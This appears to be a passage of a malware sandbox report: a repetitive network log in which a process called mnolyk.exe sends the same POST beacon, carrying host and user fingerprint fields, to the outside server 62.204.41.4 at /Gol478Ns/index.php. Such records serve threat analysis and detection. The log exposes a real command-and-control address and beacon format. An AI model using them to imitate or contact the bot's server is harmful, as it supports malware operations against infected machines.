192	192.168.2.5	49901	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:59.369719028 CET	403	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:59.432867050 CET	404	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
193	192.168.2.5	49902	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:59.605442047 CET	404	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:59.669460058 CET	405	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
194	192.168.2.5	49903	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:59.838875055 CET	405	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:59.903177977 CET	406	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
195	192.168.2.5	49904	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:00.083812952 CET	406	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:00.148993015 CET	407	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
196	192.168.2.5	49905	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:00.330108881 CET	408	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:00.394474030 CET	408	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
197	192.168.2.5	49906	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:00.574286938 CET	409	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:00.639369011 CET	409	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
198	192.168.2.5	49907	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:00.832041025 CET	410	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:00.895706892 CET	410	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
199	192.168.2.5	49908	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:01.073848963 CET	411	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:01.140189886 CET	411	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49699	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:03.880243063 CET	29	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:03.943756104 CET	44	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49720	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:10.789751053 CET	148	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:10.853640079 CET	148	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
200	192.168.2.5	49909	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:01.309253931 CET	412	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:01.374006987 CET	412	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
201	192.168.2.5	49910	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:01.546921015 CET	413	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:01.612700939 CET	413	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
202	192.168.2.5	49911	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:01.794028044 CET	414	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:01.858113050 CET	414	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
203	192.168.2.5	49912	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:02.026160955 CET	415	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:02.091125965 CET	415	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
204	192.168.2.5	49913	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:02.266315937 CET	416	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:02.329956055 CET	416	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
205	192.168.2.5	49914	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:02.515564919 CET	417	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:02.581130028 CET	417	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
206	192.168.2.5	49915	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:02.781708002 CET	418	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:02.844913006 CET	418	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
207	192.168.2.5	49916	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:03.032699108 CET	419	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:03.096664906 CET	419	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
208	192.168.2.5	49917	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:03.280189037 CET	420	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:03.342660904 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
209	192.168.2.5	49918	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:03.708586931 CET	421	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:03.772363901 CET	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49721	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:11.038423061 CET	149	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:11.104434967 CET	149	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
210	192.168.2.5	49919	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:03.999927044 CET	422	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
